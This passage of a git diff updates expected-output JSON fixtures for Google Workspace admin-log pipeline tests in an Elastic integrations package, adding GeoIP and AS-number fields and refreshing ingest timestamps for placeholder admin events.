"1", @@ -424,7 +508,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668065200Z", + "ingested": "2021-12-14T14:44:19.076075487Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_DEVICE_STATE", 
@@ -477,6 +561,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -486,7 +582,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668069700Z", + "ingested": "2021-12-14T14:44:19.076075818Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING", @@ -542,6 +638,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -551,7 +659,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668073700Z", + "ingested": "2021-12-14T14:44:19.076076153Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", "provider": "admin", "action": "INSERT_CHROME_OS_PRINT_SERVER", @@ -606,6 +714,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -615,7 +735,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668078700Z", + "ingested": "2021-12-14T14:44:19.076076484Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}", "provider": "admin", "action": "DELETE_CHROME_OS_PRINT_SERVER", @@ -670,6 +790,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -679,7 +811,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668084500Z", + "ingested": "2021-12-14T14:44:19.076076985Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_CHROME_OS_PRINT_SERVER", @@ -734,6 +866,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -743,7 +887,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668090800Z", + "ingested": "2021-12-14T14:44:19.076077764Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", "provider": "admin", "action": "INSERT_CHROME_OS_PRINTER", @@ -798,6 +942,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -807,7 +963,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668096500Z", + "ingested": "2021-12-14T14:44:19.076078331Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}", "provider": "admin", "action": "DELETE_CHROME_OS_PRINTER", @@ -862,6 +1018,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -871,7 +1039,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668102100Z", + "ingested": "2021-12-14T14:44:19.076078668Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_CHROME_OS_PRINTER", @@ -924,6 +1092,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -933,7 +1113,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668107800Z", + "ingested": "2021-12-14T14:44:19.076079009Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_SETTING", @@ -987,6 +1167,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -996,7 +1188,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668113500Z", + "ingested": "2021-12-14T14:44:19.076079410Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_USER_SETTING", 
@@ -1055,6 +1247,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1064,7 +1268,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668136600Z", + "ingested": "2021-12-14T14:44:19.076079851Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "ISSUE_DEVICE_COMMAND", @@ -1117,6 +1321,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1126,7 +1342,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668142200Z", + "ingested": "2021-12-14T14:44:19.076080178Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "MOVE_DEVICE_TO_ORG_UNIT_DETAILED", @@ -1181,6 +1397,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1190,7 +1418,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668147400Z", + "ingested": "2021-12-14T14:44:19.076080517Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "REMOVE_CHROME_OS_APPLICATION_SETTINGS", 
@@ -1245,6 +1473,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1254,7 +1494,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668152700Z", + "ingested": "2021-12-14T14:44:19.076080853Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "UPDATE_DEVICE", @@ -1309,6 +1549,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1318,7 +1570,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668158Z", + "ingested": "2021-12-14T14:44:19.076081245Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CONTACTS_SETTING", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json index 5231f1f2614..8590185f715 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.339486Z", + "ingested": "2021-12-14T14:44:22.362665935Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CONTACTS_SETTING", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json index eeb8e6f93f2..d6d247c3005 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493568900Z", + "ingested": "2021-12-14T14:44:22.555163216Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ASSIGN_ROLE", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493582300Z", + "ingested": "2021-12-14T14:44:22.555185057Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "CREATE_ROLE", 
@@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493587Z", + "ingested": "2021-12-14T14:44:22.555185992Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "DELETE_ROLE", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493593800Z", + "ingested": "2021-12-14T14:44:22.555186375Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "ADD_PRIVILEGE", 
@@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493598900Z", + "ingested": "2021-12-14T14:44:22.555186742Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "REMOVE_PRIVILEGE", @@ -352,6 +412,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -361,7 +433,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493603800Z", + "ingested": "2021-12-14T14:44:22.555187116Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "RENAME_ROLE", @@ -416,6 +488,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -425,7 +509,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493607800Z", + "ingested": "2021-12-14T14:44:22.555187649Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "UPDATE_ROLE", @@ -480,6 +564,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -489,7 +585,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:30.493613100Z", + "ingested": "2021-12-14T14:44:22.555188004Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UNASSIGN_ROLE", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json index 16011376136..05703a7a8f3 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
